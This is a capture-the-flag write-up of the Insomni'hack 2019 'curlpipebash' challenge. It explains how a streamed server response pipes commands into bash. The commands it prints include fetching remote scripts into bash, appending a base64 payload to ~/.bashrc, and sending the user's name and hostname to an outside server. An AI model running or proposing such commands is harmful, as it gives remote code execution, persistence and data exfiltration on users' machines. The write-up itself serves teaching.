# curlpipebash

```  
Welcome to Insomni'hack teaser 2019!

Execute this Bash command to print the flag :)

> curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash  
```

The request to `https://curlpipebash.teaser.insomnihack.ch/print-flag.sh`
gives us a streamed, chunked response. That means that it will send us
commands that will be executed, while itself staying alive.

This allows the server to send us different replies, depending on what
endpoints we hit.

## Request flow

We start the streamed, chunked response by running

```  
curl -Ns https://curlpipebash.teaser.insomnihack.ch/print-flag.sh | bash  
```

print-flag.sh replies with a new curl command that contains an UUID.

```  
curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID | bash  
```

When that command is executed, print-flag.sh gives us two new commands:

```  
base64 -d >> ~/.bashrc <<<
ZXhwb3J0IFBST01QVF9DT01NQU5EPSdlY2hvIFRIQU5LIFlPVSBGT1IgUExBWUlORyBJTlNPTU5JSEFDSyBURUFTRVIgMjAxOScK  
```

The base64 string is `export PROMPT_COMMAND='echo THANK YOU FOR PLAYING
INSOMNIHACK TEASER 2019'`

```  
curl -Ns https://curlpipebash.teaser.insomnihack.ch/UUID/add-to-wall-of-
shame/$(whoami)%40$(hostname)  
```

Once these are executed, print-flag.sh gives us the final command:

```  
echo "Welcome to the wall of shame"  
```

and finishes.

## Solution

To solve, just send the same requests while keeping the `print-flag.sh` alive,
and omit the `add-to-wall-of-shame` call.

[Complete solution and "exploit" code available
here](https://github.com/EdwardPwnden/ctf-2019/tree/master/Insomnihack_Teaser/curlpipebash)

Original writeup
(https://github.com/EdwardPwnden/ctf-2019/tree/master/Insomnihack_Teaser/curlpipebash).